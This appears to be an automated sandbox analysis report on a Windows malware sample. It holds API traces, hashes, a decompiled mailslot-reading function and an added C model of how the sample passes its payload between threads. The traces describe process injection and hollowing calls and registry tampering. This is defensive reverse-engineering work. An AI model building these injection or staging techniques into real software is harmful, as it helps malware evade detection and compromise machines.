  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0); // lMaxMessageSize 0x1000, lReadTimeout 0: ReadFile returns at once with ERROR_SEM_TIMEOUT when the slot is empty
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) { // ERROR_SEM_TIMEOUT: nothing queued yet, keep polling
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000); // a message shorter than 0x1000 bytes ends the transfer
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36; // receive buffer
					 *((intOrPtr*)(_t27 + 8)) = _t39; // bytes received
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
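The three C listings on this page (E00401639 starting the two threads, E004010FB opening and writing \\.\mailslot\msl0, E00401033 creating and reading it) are one procedure: the payload is handed from one thread to another inside the same process through a mailslot, in messages of at most 0x1000 bytes, with no length field anywhere; the message size is the framing. The block below is an added model of that framing written for this report; it is not code from the sample, from the initial sample crypt_0001_1096a.exe, or from Joe Sandbox. The kernel mailslot is replaced by an in-process message queue (slot_t) so it builds on any host, the Sleep(100) polling delays and Windows handles are left out, the two sides are stepped alternately with the reader polling first, and the payload is a constructed byte pattern. What it keeps from the listings are the constants and the control flow: 0x1000-byte chunks, ERROR_SEM_TIMEOUT (0x79) from a slot created with lReadTimeout = 0, the receive buffer grown by 0x1000 per message, a short message as end-of-transfer, and the writer's resend of its final byte when the last chunk was exactly 0x1000 bytes.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MSG_MAX           0x1000u /* lMaxMessageSize of the slot and the WriteFile chunk size */
#define ERROR_SEM_TIMEOUT 0x79    /* 121: ReadFile on an empty slot created with lReadTimeout = 0 */

/* Stand-in for the kernel mailslot object: a FIFO of datagrams of at most MSG_MAX bytes. */
typedef struct { size_t len; uint8_t data[MSG_MAX]; } msg_t;
typedef struct { msg_t *q; size_t head, tail, cap; } slot_t;

static int slot_write(slot_t *s, const uint8_t *p, size_t n) {
    if (n > MSG_MAX || s->tail - s->head == s->cap) return 0;
    msg_t *m = &s->q[s->tail++ % s->cap];
    m->len = n;
    memcpy(m->data, p, n);
    return 1;
}

/* 1 and the next message, or 0 with *err = ERROR_SEM_TIMEOUT when nothing is queued. */
static int slot_read(slot_t *s, uint8_t *out, size_t *n, int *err) {
    if (s->head == s->tail) { *err = ERROR_SEM_TIMEOUT; return 0; }
    msg_t *m = &s->q[s->head++ % s->cap];
    *n = m->len;
    memcpy(out, m->data, m->len);
    return 1;
}

/* Writer side, after E004010FB: one WriteFile per chunk of at most 0x1000 bytes. */
typedef struct { const uint8_t *p; size_t off, remaining; } writer_t;

static int writer_step(slot_t *s, writer_t *w) {            /* 1 while more is to be sent */
    size_t n = w->remaining >= MSG_MAX ? MSG_MAX : w->remaining;
    if (!slot_write(s, w->p + w->off, n)) return 1;         /* slot full: retry this chunk next turn */
    w->off += n;
    w->remaining -= n;
    /* The final chunk filled a whole message, which the reader takes as "more follows":
       resend the last byte as a 1-byte message so the reader's loop terminates. */
    if (w->remaining == 0 && n == MSG_MAX) { w->remaining = 1; w->off -= 1; }
    return w->remaining != 0;
}

/* Reader side, after E00401033: ReadFile into a heap buffer grown by 0x1000 per message. */
typedef struct { uint8_t *buf; size_t cap, total; } reader_t;

static int reader_step(slot_t *s, reader_t *r) {            /* 1 = keep reading, 0 = done, -1 = error */
    size_t got; int err;
    if (!slot_read(s, r->buf + r->total, &got, &err))
        return err == ERROR_SEM_TIMEOUT ? 1 : -1;            /* the sample sets _v16 = 0x1000 and polls again */
    r->total += got;
    r->cap += MSG_MAX;                                      /* keep one full message of spare room */
    uint8_t *nb = realloc(r->buf, r->cap);
    if (!nb) return -1;
    r->buf = nb;
    return got == MSG_MAX;                                  /* a short message ends the transfer */
}

/* Run both sides alternately, as the two threads started by E00401639 race on the slot.
   Returns the byte count the reader ends with; *out gets the buffer (caller frees). */
static size_t transfer(const uint8_t *payload, size_t len, uint8_t **out) {
    slot_t s = { calloc(4, sizeof(msg_t)), 0, 0, 4 };
    writer_t w = { payload, 0, len };
    reader_t r = { malloc(MSG_MAX), MSG_MAX, 0 };
    int sending = 1, reading = (s.q && r.buf) ? 1 : -1;
    while (reading > 0) {
        reading = reader_step(&s, &r);                      /* reader polls first: its first read times out */
        if (sending) sending = writer_step(&s, &w);
    }
    free(s.q);
    if (reading < 0) { free(r.buf); *out = NULL; return 0; }
    *out = r.buf;
    return r.total;
}

/* Constructed test payload: a deterministic byte pattern, not data from the sample. */
static void fill_pattern(uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++) p[i] = (uint8_t)(i * 7 + 1);
}

/* Bytes the reader ends up with for a len-byte payload. */
static size_t roundtrip_len(size_t len) {
    uint8_t *payload = malloc(len + 1), *out;
    fill_pattern(payload, len);
    size_t got = transfer(payload, len, &out);
    free(out); free(payload);
    return got;
}

/* 1 if the payload arrived intact: one duplicated last byte when len is a non-zero multiple of 0x1000, nothing extra otherwise. */
static int roundtrip_ok(size_t len) {
    uint8_t *payload = malloc(len + 1), *out;
    fill_pattern(payload, len);
    size_t got = transfer(payload, len, &out);
    size_t expect = (len && len % MSG_MAX == 0) ? len + 1 : len;
    int ok = out && got == expect && memcmp(out, payload, len) == 0
             && (expect == len || out[len] == payload[len - 1]);
    free(out); free(payload);
    return ok;
}
```

transfer() on a 0x1000-byte payload returns 0x1001 bytes, and E00401033 reports that length in its out-structure as is. That is the edge case to remember when carving the payload from the reader's heap buffer or from a mailslot capture: when the received length is 1 mod 0x1000 and the last two bytes are equal, the final byte is the writer's terminator, not payload. A trailing byte does no harm to a PE image, but a hash of the carved buffer will not match the original until it is dropped.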
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
